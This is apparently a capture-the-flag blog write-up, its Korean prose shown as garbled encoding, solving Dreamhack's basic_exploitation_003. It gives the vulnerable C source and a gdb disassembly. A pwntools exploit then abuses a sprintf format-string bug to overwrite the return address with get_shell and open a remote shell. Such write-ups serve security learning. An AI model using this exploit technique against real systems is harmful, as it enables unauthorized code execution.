๐Ÿ‘ฉ๐Ÿป‍๐Ÿ’ป ๊ฐ“์ƒ ์ง์žฅ์ธ ๋‚จ๋ฐ”์˜ค
article thumbnail
Published 2023. 2. 16. 11:55
[Pwnable] Basic_exploitation_003 Wargame/Dreamhack

1. Envrionment

Ubuntu 16.04
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

2. Code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
void get_shell() {
    system("/bin/sh");
}
int main(int argc, char *argv[]) {
    char *heap_buf = (char *)malloc(0x80);
    char stack_buf[0x90] = {};
    initialize();
    read(0, heap_buf, 0x80);
    sprintf(stack_buf, heap_buf);
    printf("ECHO : %s\n", stack_buf);
    return 0;
}

3. Write Up

(gdb) disas main
Dump of assembler code for function main:
   0x0804867c <+0>:     push   %ebp
   0x0804867d <+1>:     mov    %esp,%ebp
   0x0804867f <+3>:     push   %edi
   0x08048680 <+4>:     sub    $0x94,%esp
   0x08048686 <+10>:    push   $0x80
   0x0804868b <+15>:    call   0x8048490 <malloc@plt>
   0x08048690 <+20>:    add    $0x4,%esp
   0x08048693 <+23>:    mov    %eax,-0x8(%ebp)
   0x08048696 <+26>:    lea    -0x98(%ebp),%edx
   0x0804869c <+32>:    mov    $0x0,%eax
   0x080486a1 <+37>:    mov    $0x24,%ecx
   0x080486a6 <+42>:    mov    %edx,%edi
   0x080486a8 <+44>:    rep stos %eax,%es:(%edi)
   0x080486aa <+46>:    call   0x8048622 <initialize>
   0x080486af <+51>:    push   $0x80
   0x080486b4 <+56>:    pushl  -0x8(%ebp)
   0x080486b7 <+59>:    push   $0x0
   0x080486b9 <+61>:    call   0x8048450 <read@plt>
   0x080486be <+66>:    add    $0xc,%esp
   0x080486c1 <+69>:    pushl  -0x8(%ebp)
   0x080486c4 <+72>:    lea    -0x98(%ebp),%eax
   0x080486ca <+78>:    push   %eax
   0x080486cb <+79>:    call   0x80484f0 <sprintf@plt>
   0x080486d0 <+84>:    add    $0x8,%esp
   0x080486d3 <+87>:    lea    -0x98(%ebp),%eax
   0x080486d9 <+93>:    push   %eax
   0x080486da <+94>:    push   $0x8048791
   0x080486df <+99>:    call   0x8048460 <printf@plt>

ebp ๋ฅผ ๋ณด๋ฉด 0x98(152๋ฐ”์ดํŠธ)๋งŒํผ stack_buf ํ• ๋‹น + sfp(4๋ฐ”์ดํŠธ)

์ด์ „์— ์‚ฌ์šฉํ–ˆ๋˜ ์ต์Šค์ฝ”๋“œ๋กœ ์งœ๋ดค๋Š”๋ฐ ๊ณ„์†ํ•ด์„œ ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒํ–ˆ๋‹ค.

→ sprintf ํ•จ์ˆ˜๋Š” ํŠน์ • ํ˜•์‹์œผ๋กœ๋งŒ ๋ฐ˜ํ™˜ ๋ฐ›๋Š”๋‹ค ใ… ใ… ใ…  char ํ˜•์‹์œผ๋กœ ์ธ์ž๋ฅผ ๋„˜๊ฒจ์ค˜์•ผํ•จ..

Format string bug ๋ฐœ์ƒ

 

from pwn import *

p = remote("host3.dreamhack.games", 9804)
e = ELF("./basic_exploitation_003")

get_shell = 0x08048669

payload = b"%156c" + p32(get_shell)

p.send(payload)
p.interactive()

'Wargame > Dreamhack' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

[Pwnable] Basic_exploitation_002  (0) 2023.02.16
[Pwnable] Return Address Overwrite  (0) 2023.02.16
[Pwnable] shell_basic  (0) 2023.02.16
[Pwnable] Basic_exploitation_000  (0) 2023.02.16
[Pwnable] Basic_exploitation_001  (0) 2023.02.16
profile

๐Ÿ‘ฉ๐Ÿป‍๐Ÿ’ป ๊ฐ“์ƒ ์ง์žฅ์ธ ๋‚จ๋ฐ”์˜ค

@๋‚จ๋ฐ”์˜ค

ํ‹ฐ์Šคํ† ๋ฆฌํˆด๋ฐ”